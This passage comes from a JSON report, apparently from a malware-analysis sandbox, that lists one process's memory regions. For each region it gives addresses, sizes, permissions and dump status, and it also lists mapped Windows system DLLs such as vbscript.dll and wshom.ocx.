"process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 35586048, "type": "region", "version": 1 }, "end_va": 36110335, "entry_point": 0, "filename": null, "id": "region_1328", "name": "private_0x00000000021f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35586048, "timestamp": "00:01:07.665", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001329-addr_0x000007fffffd8000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_205", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092858368, "type": "region", "version": 1 }, "end_va": 8796092866559, "entry_point": 0, "filename": null, "id": "region_1329", "name": "private_0x000007fffffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092858368, "timestamp": "00:01:07.665", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001330-addr_0x0000000000610000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_206", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 6356992, "type": "region", "version": 1 }, "end_va": 6361087, "entry_point": 0, "filename": null, "id": "region_1330", "name": "private_0x0000000000610000", "norm_filename": null, "region_type": "private_memory", "start_va": 6356992, "timestamp": "00:01:07.667", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 
6356992, "type": "region", "version": 1 }, "end_va": 6361087, "entry_point": 0, "filename": null, "id": "region_1331", "name": "pagefile_0x0000000000610000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6356992, "timestamp": "00:01:07.667", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 8791636770816, "type": "region", "version": 1 }, "end_va": 8791636807679, "entry_point": 8791636776116, "filename": "\\Windows\\System32\\SensApi.dll", "id": "region_1332", "name": "sensapi.dll", "norm_filename": "c:\\windows\\system32\\sensapi.dll", "region_type": "memory_mapped_file", "start_va": 8791636770816, "timestamp": "00:01:07.669", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 47906816, "type": "region", "version": 1 }, "end_va": 48955391, "entry_point": 0, "filename": null, "id": "region_1333", "name": "private_0x0000000002db0000", "norm_filename": null, "region_type": "private_memory", "start_va": 47906816, "timestamp": "00:01:07.686", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001334-addr_0x000007fffffd4000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_207", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092841984, "type": "region", "version": 1 }, "end_va": 8796092850175, "entry_point": 0, "filename": null, "id": "region_1334", "name": 
"private_0x000007fffffd4000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092841984, "timestamp": "00:01:07.687", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 8791730356224, "type": "region", "version": 1 }, "end_va": 8791730442239, "entry_point": 8791730381016, "filename": "\\Windows\\System32\\nlaapi.dll", "id": "region_1335", "name": "nlaapi.dll", "norm_filename": "c:\\windows\\system32\\nlaapi.dll", "region_type": "memory_mapped_file", "start_va": 8791730356224, "timestamp": "00:01:07.689", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001336-addr_0x0000000002a80000-size_0x0000000000170000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_208", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1507328, "start_va": 44564480, "type": "region", "version": 1 }, "end_va": 46071807, "entry_point": 0, "filename": null, "id": "region_1336", "name": "private_0x0000000002a80000", "norm_filename": null, "region_type": "private_memory", "start_va": 44564480, "timestamp": "00:01:07.692", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001337-addr_0x0000000002c40000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_209", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 46399488, "type": "region", "version": 1 }, "end_va": 46923775, 
"entry_point": 0, "filename": null, "id": "region_1337", "name": "private_0x0000000002c40000", "norm_filename": null, "region_type": "private_memory", "start_va": 46399488, "timestamp": "00:01:07.693", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001338-addr_0x0000000002eb0000-size_0x00000000001d0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_210", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1900544, "start_va": 48955392, "type": "region", "version": 1 }, "end_va": 50855935, "entry_point": 0, "filename": null, "id": "region_1338", "name": "private_0x0000000002eb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 48955392, "timestamp": "00:01:07.694", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001339-addr_0x0000000000620000-size_0x00000000000a0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_211", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 6422528, "type": "region", "version": 1 }, "end_va": 7077887, "entry_point": 0, "filename": null, "id": "region_1339", "name": "private_0x0000000000620000", "norm_filename": null, "region_type": "private_memory", "start_va": 6422528, "timestamp": "00:01:07.695", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 8791603871744, "type": "region", "version": 1 }, "end_va": 8791603904511, "entry_point": 8791603876884, "filename": "\\Windows\\System32\\rasadhlp.dll", "id": "region_1343", 
"name": "rasadhlp.dll", "norm_filename": "c:\\windows\\system32\\rasadhlp.dll", "region_type": "memory_mapped_file", "start_va": 8791603871744, "timestamp": "00:01:07.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 49676288, "type": "region", "version": 1 }, "end_va": 50724863, "entry_point": 0, "filename": null, "id": "region_1344", "name": "private_0x0000000002f60000", "norm_filename": null, "region_type": "private_memory", "start_va": 49676288, "timestamp": "00:01:07.743", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001345-addr_0x0000000003070000-size_0x0000000000010000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_213", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 50790400, "type": "region", "version": 1 }, "end_va": 50855935, "entry_point": 0, "filename": null, "id": "region_1345", "name": "private_0x0000000003070000", "norm_filename": null, "region_type": "private_memory", "start_va": 50790400, "timestamp": "00:01:07.743", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001346-addr_0x000007fffffae000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_214", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092686336, "type": "region", "version": 1 }, "end_va": 8796092694527, 
"entry_point": 0, "filename": null, "id": "region_1346", "name": "private_0x000007fffffae000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092686336, "timestamp": "00:01:07.743", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001347-addr_0x0000000000620000-size_0x0000000000040000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_215", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 6422528, "type": "region", "version": 1 }, "end_va": 6684671, "entry_point": 0, "filename": null, "id": "region_1347", "name": "private_0x0000000000620000", "norm_filename": null, "region_type": "private_memory", "start_va": 6422528, "timestamp": "00:01:07.745", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 51314688, "type": "region", "version": 1 }, "end_va": 52363263, "entry_point": 0, "filename": null, "id": "region_1348", "name": "private_0x00000000030f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 51314688, "timestamp": "00:01:07.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 2006712320, "type": "region", "version": 1 }, "end_va": 2006724607, "entry_point": 2006712320, "filename": "\\Windows\\System32\\normaliz.dll", "id": "region_1349", "name": "normaliz.dll", 
"norm_filename": "c:\\windows\\system32\\normaliz.dll", "region_type": "memory_mapped_file", "start_va": 2006712320, "timestamp": "00:01:07.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 475136, "start_va": 8791636967424, "type": "region", "version": 1 }, "end_va": 8791637442559, "entry_point": 8791636993776, "filename": "\\Windows\\System32\\netprofm.dll", "id": "region_1350", "name": "netprofm.dll", "norm_filename": "c:\\windows\\system32\\netprofm.dll", "region_type": "memory_mapped_file", "start_va": 8791636967424, "timestamp": "00:01:07.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791741300736, "type": "region", "version": 1 }, "end_va": 8791741329407, "entry_point": 8791741306032, "filename": "\\Windows\\System32\\WSHTCPIP.DLL", "id": "region_1351", "name": "wshtcpip.dll", "norm_filename": "c:\\windows\\system32\\wshtcpip.dll", "region_type": "memory_mapped_file", "start_va": 8791741300736, "timestamp": "00:01:07.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 348160, "start_va": 8791747592192, "type": "region", "version": 1 }, "end_va": 8791747940351, "entry_point": 8791747596372, "filename": "\\Windows\\System32\\mswsock.dll", "id": "region_1352", "name": "mswsock.dll", "norm_filename": "c:\\windows\\system32\\mswsock.dll", "region_type": "memory_mapped_file", "start_va": 8791747592192, "timestamp": "00:01:07.779", "type": "region", 
"version": 1 }, { "dump": { "filename": "process_00000007-region_00001353-addr_0x000007fffffac000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_216", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092678144, "type": "region", "version": 1 }, "end_va": 8796092686335, "entry_point": 0, "filename": null, "id": "region_1353", "name": "private_0x000007fffffac000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092678144, "timestamp": "00:01:07.779", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001354-addr_0x0000000003340000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_217", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 53739520, "type": "region", "version": 1 }, "end_va": 54788095, "entry_point": 0, "filename": null, "id": "region_1354", "name": "private_0x0000000003340000", "norm_filename": null, "region_type": "private_memory", "start_va": 53739520, "timestamp": "00:01:07.789", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001355-addr_0x000007fffffaa000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_218", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092669952, "type": "region", "version": 1 }, "end_va": 8796092678143, "entry_point": 0, "filename": null, "id": "region_1355", "name": "private_0x000007fffffaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 
8796092669952, "timestamp": "00:01:07.789", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791581261824, "type": "region", "version": 1 }, "end_va": 8791581319167, "entry_point": 8791581266032, "filename": "\\Windows\\System32\\msimtf.dll", "id": "region_1356", "name": "msimtf.dll", "norm_filename": "c:\\windows\\system32\\msimtf.dll", "region_type": "memory_mapped_file", "start_va": 8791581261824, "timestamp": "00:01:07.792", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001359-addr_0x0000000002a80000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_219", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 44564480, "type": "region", "version": 1 }, "end_va": 45613055, "entry_point": 0, "filename": null, "id": "region_1359", "name": "private_0x0000000002a80000", "norm_filename": null, "region_type": "private_memory", "start_va": 44564480, "timestamp": "00:01:07.822", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001360-addr_0x0000000002be0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_220", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 46006272, "type": "region", "version": 1 }, "end_va": 46071807, "entry_point": 0, 
"filename": null, "id": "region_1360", "name": "private_0x0000000002be0000", "norm_filename": null, "region_type": "private_memory", "start_va": 46006272, "timestamp": "00:01:07.822", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 344064, "start_va": 8791566254080, "type": "region", "version": 1 }, "end_va": 8791566598143, "entry_point": 8791566258252, "filename": "\\Windows\\System32\\oleacc.dll", "id": "region_1361", "name": "oleacc.dll", "norm_filename": "c:\\windows\\system32\\oleacc.dll", "region_type": "memory_mapped_file", "start_va": 8791566254080, "timestamp": "00:01:07.824", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 6684672, "type": "region", "version": 1 }, "end_va": 6688767, "entry_point": 6684672, "filename": "\\Windows\\System32\\oleaccrc.dll", "id": "region_1362", "name": "oleaccrc.dll", "norm_filename": "c:\\windows\\system32\\oleaccrc.dll", "region_type": "memory_mapped_file", "start_va": 6684672, "timestamp": "00:01:07.825", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791744839680, "type": "region", "version": 1 }, "end_va": 8791745130495, "entry_point": 8791744843876, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1363", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791744839680, "timestamp": "00:01:07.871", "type": "region", "version": 1 }, { "dump": { 
"filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791747985408, "type": "region", "version": 1 }, "end_va": 8791748079615, "entry_point": 8791747998392, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_1364", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791747985408, "timestamp": "00:01:07.872", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 8791755259904, "type": "region", "version": 1 }, "end_va": 8791755341823, "entry_point": 8791755264224, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_1365", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 8791755259904, "timestamp": "00:01:07.872", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 52625408, "type": "region", "version": 1 }, "end_va": 53673983, "entry_point": 0, "filename": null, "id": "region_1366", "name": "private_0x0000000003230000", "norm_filename": null, "region_type": "private_memory", "start_va": 52625408, "timestamp": "00:01:07.876", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001367-addr_0x000007fffffa8000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], 
"ref_process_dump": { "ref_id": "proc_dump_221", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092661760, "type": "region", "version": 1 }, "end_va": 8796092669951, "entry_point": 0, "filename": null, "id": "region_1367", "name": "private_0x000007fffffa8000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092661760, "timestamp": "00:01:07.876", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 593920, "start_va": 8791754342400, "type": "region", "version": 1 }, "end_va": 8791754936319, "entry_point": 8791754347584, "filename": "\\Windows\\System32\\sxs.dll", "id": "region_1368", "name": "sxs.dll", "norm_filename": "c:\\windows\\system32\\sxs.dll", "region_type": "memory_mapped_file", "start_va": 8791754342400, "timestamp": "00:01:07.878", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 6750208, "type": "region", "version": 1 }, "end_va": 6754303, "entry_point": 0, "filename": null, "id": "region_1369", "name": "pagefile_0x0000000000670000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6750208, "timestamp": "00:01:07.881", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12283904, "start_va": 8791566647296, "type": "region", "version": 1 }, "end_va": 8791578931199, "entry_point": 8791566654424, "filename": 
"\\Windows\\System32\\ieframe.dll", "id": "region_1372", "name": "ieframe.dll", "norm_filename": "c:\\windows\\system32\\ieframe.dll", "region_type": "memory_mapped_file", "start_va": 8791566647296, "timestamp": "00:01:07.889", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 6750208, "type": "region", "version": 1 }, "end_va": 6758399, "entry_point": 0, "filename": null, "id": "region_1373", "name": "pagefile_0x0000000000670000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6750208, "timestamp": "00:01:07.891", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 54788096, "type": "region", "version": 1 }, "end_va": 58929151, "entry_point": 0, "filename": null, "id": "region_1374", "name": "pagefile_0x0000000003440000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 54788096, "timestamp": "00:01:07.894", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791592992768, "type": "region", "version": 1 }, "end_va": 8791593041919, "entry_point": 8791593017388, "filename": "\\Windows\\System32\\npmproxy.dll", "id": "region_1438", "name": "npmproxy.dll", "norm_filename": "c:\\windows\\system32\\npmproxy.dll", "region_type": "memory_mapped_file", "start_va": 8791592992768, "timestamp": "00:01:08.053", "type": "region", "version": 1 }, { 
"dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791713710080, "type": "region", "version": 1 }, "end_va": 8791713755135, "entry_point": 8791713714912, "filename": "\\Windows\\System32\\winrnr.dll", "id": "region_1439", "name": "winrnr.dll", "norm_filename": "c:\\windows\\system32\\winrnr.dll", "region_type": "memory_mapped_file", "start_va": 8791713710080, "timestamp": "00:01:08.054", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 8791713775616, "type": "region", "version": 1 }, "end_va": 8791713878015, "entry_point": 8791713781628, "filename": "\\Windows\\System32\\pnrpnsp.dll", "id": "region_1440", "name": "pnrpnsp.dll", "norm_filename": "c:\\windows\\system32\\pnrpnsp.dll", "region_type": "memory_mapped_file", "start_va": 8791713775616, "timestamp": "00:01:08.055", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 8791713906688, "type": "region", "version": 1 }, "end_va": 8791713992703, "entry_point": 8791713911456, "filename": "\\Windows\\System32\\NapiNSP.dll", "id": "region_1441", "name": "napinsp.dll", "norm_filename": "c:\\windows\\system32\\napinsp.dll", "region_type": "memory_mapped_file", "start_va": 8791713906688, "timestamp": "00:01:08.055", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], 
"ref_process_dump": null, "size": 28672, "start_va": 8791747526656, "type": "region", "version": 1 }, "end_va": 8791747555327, "entry_point": 8791747531820, "filename": "\\Windows\\System32\\wship6.dll", "id": "region_1442", "name": "wship6.dll", "norm_filename": "c:\\windows\\system32\\wship6.dll", "region_type": "memory_mapped_file", "start_va": 8791747526656, "timestamp": "00:01:08.056", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 630784, "start_va": 8791265509376, "type": "region", "version": 1 }, "end_va": 8791266140159, "entry_point": 8791265567160, "filename": "\\Windows\\System32\\vbscript.dll", "id": "region_1443", "name": "vbscript.dll", "norm_filename": "c:\\windows\\system32\\vbscript.dll", "region_type": "memory_mapped_file", "start_va": 8791265509376, "timestamp": "00:01:08.060", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 163840, "start_va": 8791347822592, "type": "region", "version": 1 }, "end_va": 8791347986431, "entry_point": 8791347826800, "filename": "\\Windows\\System32\\wshom.ocx", "id": "region_1444", "name": "wshom.ocx", "norm_filename": "c:\\windows\\system32\\wshom.ocx", "region_type": "memory_mapped_file", "start_va": 8791347822592, "timestamp": "00:01:08.079", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 8791688151040, "type": "region", "version": 1 }, "end_va": 8791688249343, "entry_point": 8791688155152, 
"filename": "\\Windows\\System32\\mpr.dll", "id": "region_1445", "name": "mpr.dll", "norm_filename": "c:\\windows\\system32\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 8791688151040, "timestamp": "00:01:08.081", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 212992, "start_va": 8791268327424, "type": "region", "version": 1 }, "end_va": 8791268540415, "entry_point": 8791268331620, "filename": "\\Windows\\System32\\scrrun.dll", "id": "region_1446", "name": "scrrun.dll", "norm_filename": "c:\\windows\\system32\\scrrun.dll", "region_type": "memory_mapped_file", "start_va": 8791268327424, "timestamp": "00:01:08.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 81920, "start_va": 6815744, "type": "region", "version": 1 }, "end_va": 6897663, "entry_point": 6819952, "filename": "\\Windows\\System32\\wshom.ocx", "id": "region_1447", "name": "wshom.ocx", "norm_filename": "c:\\windows\\system32\\wshom.ocx", "region_type": "memory_mapped_file", "start_va": 6815744, "timestamp": "00:01:08.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 6946816, "type": "region", "version": 1 }, "end_va": 6955007, "entry_point": 0, "filename": null, "id": "region_1766", "name": "pagefile_0x00000000006a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6946816, "timestamp": "00:01:15.218", "type": "region", "version": 1 }, { "dump": 
{ "filename": "process_00000007-region_00001774-addr_0x0000000003960000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_327", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 60162048, "type": "region", "version": 1 }, "end_va": 61210623, "entry_point": 0, "filename": null, "id": "region_1774", "name": "private_0x0000000003960000", "norm_filename": null, "region_type": "private_memory", "start_va": 60162048, "timestamp": "00:01:15.222", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001775-addr_0x0000000003b20000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_328", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 61997056, "type": "region", "version": 1 }, "end_va": 62521343, "entry_point": 0, "filename": null, "id": "region_1775", "name": "private_0x0000000003b20000", "norm_filename": null, "region_type": "private_memory", "start_va": 61997056, "timestamp": "00:01:15.222", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001782-addr_0x000007fffffa6000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_329", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092653568, "type": "region", "version": 1 }, "end_va": 8796092661759, "entry_point": 0, 
